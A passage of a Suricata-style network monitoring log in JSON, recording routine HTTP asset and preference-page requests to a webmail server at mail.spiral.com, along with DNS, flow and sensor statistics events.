Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119}} {"timestamp":"2020-02-29T00:03:09.242286+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119},"app_proto":"http","fileinfo":{"filename":"\/js\/tables.js","state":"CLOSED","stored":false,"size":6954,"tx_id":4}} {"timestamp":"2020-02-29T00:03:09.247875+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108}} {"timestamp":"2020-02-29T00:03:09.249821+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tab.png","state":"CLOSED","stored":false,"size":108,"tx_id":5}} {"timestamp":"2020-02-29T00:03:09.250673+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512}} {"timestamp":"2020-02-29T00:03:09.250924+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:03:09.252524+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52670,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-split.png","state":"CLOSED","stored":false,"size":87,"tx_id":0}} {"timestamp":"2020-02-29T00:03:09.252937+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/add.png","state":"CLOSED","stored":false,"size":512,"tx_id":6}} {"timestamp":"2020-02-29T00:03:09.253102+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460}} {"timestamp":"2020-02-29T00:03:09.253546+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52670,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/search.png","state":"CLOSED","stored":false,"size":460,"tx_id":1}} {"timestamp":"2020-02-29T00:03:09.254808+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465}} {"timestamp":"2020-02-29T00:03:09.256273+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/nag.png","state":"CLOSED","stored":false,"size":465,"tx_id":7}} {"timestamp":"2020-02-29T00:03:09.257064+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515}} {"timestamp":"2020-02-29T00:03:09.258222+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/plus-sidebar.png","state":"CLOSED","stored":false,"size":515,"tx_id":8}} {"timestamp":"2020-02-29T00:03:09.265133+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:03:09.267064+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/collapse.png","state":"CLOSED","stored":false,"size":227,"tx_id":9}} {"timestamp":"2020-02-29T00:03:09.268635+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220}} {"timestamp":"2020-02-29T00:03:09.270134+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-fff.png","state":"CLOSED","stored":false,"size":220,"tx_id":10}} {"timestamp":"2020-02-29T00:03:09.272134+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:03:09.273149+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":11}} {"timestamp":"2020-02-29T00:03:09.297306+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386}} {"timestamp":"2020-02-29T00:03:09.317382+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:03:09.333736+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/expand.png","state":"CLOSED","stored":false,"size":234,"tx_id":12}} {"timestamp":"2020-02-29T00:03:09.334195+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:03:12.486743+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5173},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21411,"tx_id":1}} {"timestamp":"2020-02-29T00:03:14.258675+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52670,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/data.png","state":"CLOSED","stored":false,"size":386,"tx_id":2}} {"timestamp":"2020-02-29T00:03:14.339998+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":13}} {"timestamp":"2020-02-29T00:03:16.000265+0000","event_type":"stats","stats":{"uptime":13848,"capture":{"kernel_packets":132906,"kernel_drops":0},"decoder":{"pkts":132909,"bytes":92153610,"invalid":180,"ipv4":131476,"ipv6":8,"ethernet":132909,"raw":0,"null":0,"sll":0,"tcp":126450,"udp":4832,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2682,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2698,"synack":2689,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1727,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2202,"failed_udp":108},"tx":{"http":4490,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2279}},"flow_mgr":{"closed_pruned":2654,"new_pruned":15,"est_pruned":2245,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21823,"memcap_state":0,"memcap_global":0},"http":{"memuse":47133,"memcap":0}}} {"timestamp":"2020-02-29T00:03:17.000187+0000","flow_id":148780504013802,"event_type":"flow","src_ip":"192.168.10.122","src_port":56194,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:15.941034+0000","end":"2020-02-28T23:58:16.052379+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:20.456707+0000","flow_id":97464254789635,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35466,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16659,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:20.562100+0000","flow_id":97464254789635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35466,"proto":"UDP","dns":{"type":"answer","id":16659,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:20.562100+0000","flow_id":97464254789635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35466,"proto":"UDP","dns":{"type":"answer","id":16659,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:20.685840+0000","flow_id":1755149832342807,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:03:20.701894+0000","flow_id":1755149832342807,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5267}} {"timestamp":"2020-02-29T00:03:21.000204+0000","flow_id":1408258204220712,"event_type":"flow","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":20,"bytes_toserver":5143,"bytes_toclient":14597,"start":"2020-02-29T00:02:11.900392+0000","end":"2020-02-29T00:02:20.574550+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:21.000418+0000","flow_id":872675782682226,"event_type":"flow","src_ip":"192.168.10.81","src_port":52658,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":843,"bytes_toclient":1539,"start":"2020-02-29T00:02:15.452210+0000","end":"2020-02-29T00:02:20.466510+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:21.000519+0000","flow_id":1477475882025965,"event_type":"flow","src_ip":"192.168.10.122","src_port":45481,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:20.115693+0000","end":"2020-02-28T23:58:20.227236+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:21.000682+0000","flow_id":246860392947698,"event_type":"flow","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":11,"bytes_toserver":2743,"bytes_toclient":7902,"start":"2020-02-29T00:02:15.450546+0000","end":"2020-02-29T00:02:20.574521+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:23.000217+0000","event_type":"stats","stats":{"uptime":13855,"capture":{"kernel_packets":132918,"kernel_drops":0},"decoder":{"pkts":132932,"bytes":92161692,"invalid":180,"ipv4":131499,"ipv6":8,"ethernet":132932,"raw":0,"null":0,"sll":0,"tcp":126471,"udp":4834,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10004,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2683,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2699,"synack":2690,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1728,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2203,"failed_udp":108},"tx":{"http":4491,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2280}},"flow_mgr":{"closed_pruned":2657,"new_pruned":15,"est_pruned":2247,"bypassed_pruned":0,"flows_checked":6,"flows_notimeout":2,"flows_timeout":4,"flows_timeout_inuse":0,"flows_removed":4,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21492,"memcap_state":0,"memcap_global":0},"http":{"memuse":102937,"memcap":0}}} {"timestamp":"2020-02-29T00:03:25.000544+0000","flow_id":359534564994154,"event_type":"flow","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":21,"bytes_toserver":4143,"bytes_toclient":20807,"start":"2020-02-29T00:02:15.453738+0000","end":"2020-02-29T00:02:24.404757+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:25.702845+0000","flow_id":1755149832342807,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34718,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5267},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21565,"tx_id":0}} {"timestamp":"2020-02-29T00:03:29.000556+0000","flow_id":2170112373483042,"event_type":"flow","src_ip":"192.168.10.122","src_port":56279,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:28.583202+0000","end":"2020-02-28T23:58:28.694600+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:30.000154+0000","event_type":"stats","stats":{"uptime":13862,"capture":{"kernel_packets":132932,"kernel_drops":0},"decoder":{"pkts":132935,"bytes":92161890,"invalid":180,"ipv4":131502,"ipv6":8,"ethernet":132935,"raw":0,"null":0,"sll":0,"tcp":126474,"udp":4834,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2683,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"sy